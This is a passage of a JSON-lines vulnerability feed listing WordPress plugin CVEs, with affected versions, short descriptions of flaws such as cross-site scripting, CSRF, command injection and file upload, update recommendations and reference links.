{"CVE_ID":"CVE-2025-7811","slug":"streamweasels-youtube-integration","versionImpact":"1.4.0","versionEndExcluding":"1.4.1","description":"The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'data-uuid' attribute in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-youtube-integration\\\/trunk\\\/public\\\/js\\\/streamweasels-youtube-public.js#L874\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-youtube-integration\\\/trunk\\\/public\\\/js\\\/streamweasels-youtube-public.js#L874\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335284#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335284#file11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb6783b4-f7a5-4f8f-a8d0-5f5c7f91f687?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb6783b4-f7a5-4f8f-a8d0-5f5c7f91f687?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-33928","slug":"wp-migration-duplicator","versionImpact":"1.4.0","versionEndExcluding":"1.4.1","description":"Missing Authorization vulnerability in WebToffee WordPress Backup & Migration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Backup & Migration: from n\/a through 1.4.0.","recommendation":"Update to version 1.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-wordpress-backup-migration-plugin-1-4-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-wordpress-backup-migration-plugin-1-4-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0419","slug":"shortcode-for-font-awesome","versionEndExcluding":"1.4.1","description":"The Shortcode for Font Awesome WordPress plugin before 1.4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ccfee43-920d-4613-b976-2ea8966696ba\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ccfee43-920d-4613-b976-2ea8966696ba\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5942","slug":"media-list","versionImpact":"1.4.0","versionEndExcluding":"1.4.1","description":"The Medialist WordPress plugin before 1.4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 1.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/914559e1-eed5-4a69-8371-a48055835453\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/914559e1-eed5-4a69-8371-a48055835453\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36669","slug":"backup","versionEndExcluding":"1.4.0","description":"The JetBackup \u2013 WP Backup, Migrate & Restore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including 1.3.9. This is due to missing nonce validation on the backup_guard_get_import_backup() function. This makes it possible for unauthenticated attackers to upload arbitrary files to the vulnerable site's server via a forged request, granted they can trick a site's administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2341420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2341420\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae8de00-ba4c-48d2-a566-13dac0bc4312\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae8de00-ba4c-48d2-a566-13dac0bc4312\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7002","slug":"backup-backup","versionImpact":"1.3.9","versionEndExcluding":"1.4.0","description":"The Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9 via the 'url' parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc49db10-988d-42bd-a9cf-9a86f4c79568?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc49db10-988d-42bd-a9cf-9a86f4c79568?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L1518\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L1518\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L1503\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L1503\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.linuxquestions.org\\\/questions\\\/linux-security-4\\\/php-function-exec-enabled-how-big-issue-4175508082\\\/\",\"name\":\"https:\\\/\\\/www.linuxquestions.org\\\/questions\\\/linux-security-4\\\/php-function-exec-enabled-how-big-issue-4175508082\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6972","slug":"backup-backup","versionImpact":"1.3.9","versionEndExcluding":"1.4.0","description":"The Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the 'content-backups' and 'content-name', 'content-manifest', or 'content-bmitmp' and 'content-identy' HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a3ae696-f67d-4ed2-b307-d2f36b6f188c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a3ae696-f67d-4ed2-b307-d2f36b6f188c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/backup-heart.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/backup-heart.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/bypasser.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/bypasser.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6971","slug":"backup-backup","versionImpact":"1.3.9","versionEndExcluding":"1.4.0","description":"The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the 'content-dir' HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server's php.ini is configured with 'allow_url_include' set to 'on'. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b380283c-0dbb-4d67-9f66-cb7c400c0427?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b380283c-0dbb-4d67-9f66-cb7c400c0427?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/backup-heart.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/backup-heart.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1993","slug":"icon-widget","versionImpact":"1.3.0","versionEndExcluding":"1.4.0","description":"The Icon Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7352ab6d-b582-4512-a9fa-4b42b78fa862?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7352ab6d-b582-4512-a9fa-4b42b78fa862?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/icon-widget\\\/trunk\\\/src\\\/Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/icon-widget\\\/trunk\\\/src\\\/Shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3068501\\\/#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3068501\\\/#file10\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0495","slug":"ht-slider-for-elementor","versionEndExcluding":"1.4.0","description":"The HT Slider For Elementor WordPress plugin before 1.4.0 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e3af480-b1a4-404c-b0fc-2b7b6a6b9c27\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e3af480-b1a4-404c-b0fc-2b7b6a6b9c27\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7236","slug":"backup-bolt","versionImpact":"1.3.0","versionEndExcluding":"1.4.0","description":"The Backup Bolt WordPress plugin through 1.3.0 is vulnerable to Information Exposure via the unprotected access of debug logs. This makes it possible for unauthenticated attackers to retrieve the debug log which may contain information like system errors which could contain sensitive information.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a4557e2-b764-4678-a6d6-af39dd1ba76b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a4557e2-b764-4678-a6d6-af39dd1ba76b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0559","slug":"gs-envato-portfolio","versionEndExcluding":"1.4.0","description":"The GS Portfolio for Envato WordPress plugin before 1.4.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5549261-66e2-4a5e-8781-bc555b629ccc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5549261-66e2-4a5e-8781-bc555b629ccc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1119","slug":"order-tip-woo","versionImpact":"1.3.1","versionEndExcluding":"1.4.0","description":"The Order Tip for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_tips_to_csv() function in all versions up to, and including, 1.3.1. This makes it possible for unauthenticated attackers to export the plugin's order fees.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f837d6b-d1fa-4019-892a-dca3c0f29ca7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f837d6b-d1fa-4019-892a-dca3c0f29ca7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/admin\\\/controllers\\\/reports.class.php#L359\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/admin\\\/controllers\\\/reports.class.php#L359\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052259%40order-tip-woo&new=3052259%40order-tip-woo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052259%40order-tip-woo&new=3052259%40order-tip-woo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4625","slug":"login-logout-menu","versionEndExcluding":"1.4.0","description":"The Login Logout Menu WordPress plugin before 1.4.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd6657d5-810c-4d0c-8bbf-1f8d4a2d8d15\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd6657d5-810c-4d0c-8bbf-1f8d4a2d8d15\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5882","slug":"ultimate-classified-listings","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The Ultimate Classified Listings WordPress plugin before 1.3 does not validate the `ucl_page` and `layout` parameters allowing unauthenticated users to access PHP files on the server from the listings page","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e8d7808-8f3e-4fc9-a1e7-e108da031ca7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e8d7808-8f3e-4fc9-a1e7-e108da031ca7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6529","slug":"ultimate-classified-listings","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The Ultimate Classified Listings WordPress plugin before 1.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a346c9a-cc1a-46b1-b27a-a77a38449933\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a346c9a-cc1a-46b1-b27a-a77a38449933\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10137","slug":"website-contact-form-with-file-upload","versionImpact":"1.3.4","versionEndExcluding":"1.4","description":"The Website Contact Form With File Upload plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload_file()' function in versions up to, and including, 1.3.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131413\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131413\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131514\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131514\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-contact-form-with-file-upload\\\/trunk\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-contact-form-with-file-upload\\\/trunk\\\/readme.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-contact-form-with-file-upload\\\/trunk\\\/readme.txt#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-contact-form-with-file-upload\\\/trunk\\\/readme.txt#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-n-media-website-contact-form-with-file-upload-arbitrary-file-upload-1-3-4\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-n-media-website-contact-form-with-file-upload-arbitrary-file-upload-1-3-4\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.homelab.it\\\/index.php\\\/2015\\\/04\\\/12\\\/wordpress-n-media-website-contact-form-shell-upload\\\/\",\"name\":\"https:\\\/\\\/www.homelab.it\\\/index.php\\\/2015\\\/04\\\/12\\\/wordpress-n-media-website-contact-form-shell-upload\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8395e0c4-3feb-4551-9f2f-7b80cd187eca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8395e0c4-3feb-4551-9f2f-7b80cd187eca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1627","slug":"qi-blocks","versionImpact":"1.3.6","versionEndExcluding":"1.4","description":"The Qi Blocks WordPress plugin before 1.4 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31b2292b-1ea7-4d63-ad65-0366e2c05dd3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31b2292b-1ea7-4d63-ad65-0366e2c05dd3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1626","slug":"qi-blocks","versionImpact":"1.3.6","versionEndExcluding":"1.4","description":"The Qi Blocks WordPress plugin before 1.4 does not validate and escape some of its Countdown block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f00d86f1-7ff9-4001-af16-989358d811a8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f00d86f1-7ff9-4001-af16-989358d811a8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1625","slug":"qi-blocks","versionImpact":"1.3.6","versionEndExcluding":"1.4","description":"The Qi Blocks WordPress plugin before 1.4 does not validate and escape some of its Counter block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/288208c4-e9ca-4b79-88e7-fb415a726fce\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/288208c4-e9ca-4b79-88e7-fb415a726fce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13575","slug":"web-stories-enhancer","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The Web Stories Enhancer \u2013 Level Up Your Web Stories plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'web_stories_enhancer' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/web-stories-enhancer\\\/trunk\\\/includes\\\/shortcode.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/web-stories-enhancer\\\/trunk\\\/includes\\\/shortcode.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238312%40web-stories-enhancer&new=3238312%40web-stories-enhancer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238312%40web-stories-enhancer&new=3238312%40web-stories-enhancer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc614f2-37a6-474a-828a-1f34f98715c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc614f2-37a6-474a-828a-1f34f98715c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8479","slug":"simple-spoiler","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The Simple Spoiler plugin for WordPress is vulnerable to arbitrary shortcode execution in versions 1.2 to 1.3. This is due to the plugin adding the filter add_filter('comment_text', 'do_shortcode'); which will run all shortcodes in comments. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ffc76d8-b841-4c26-bbc6-1f96664efe36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ffc76d8-b841-4c26-bbc6-1f96664efe36?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-spoiler\\\/trunk\\\/simple-spoiler.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-spoiler\\\/trunk\\\/simple-spoiler.php#L108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151179%40simple-spoiler&new=3151179%40simple-spoiler&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151179%40simple-spoiler&new=3151179%40simple-spoiler&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8737","slug":"pdf-thumbnail-generator","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The PDF Thumbnail Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b183587b-95bd-4e82-bfc7-db5a8fbd58f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b183587b-95bd-4e82-bfc7-db5a8fbd58f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-thumbnail-generator\\\/tags\\\/1.3\\\/pdf-thumbnail-generator.php#L184\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-thumbnail-generator\\\/tags\\\/1.3\\\/pdf-thumbnail-generator.php#L184\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151055\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151055\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5667","slug":"tabs-pro","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The Tab Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08220b23-d6fa-4005-bbbb-019412d328a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08220b23-d6fa-4005-bbbb-019412d328a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tabs-pro\\\/trunk\\\/theme\\\/tab-shortcode-ultimate-themes.php?rev=2406144#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tabs-pro\\\/trunk\\\/theme\\\/tab-shortcode-ultimate-themes.php?rev=2406144#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982005\\\/tabs-pro#file23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982005\\\/tabs-pro#file23\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0469","slug":"forminator","versionImpact":"1.39.2","versionEndExcluding":"1.39.3","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slider template data in all versions up to, and including, 1.39.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.39.3, or a newer patched 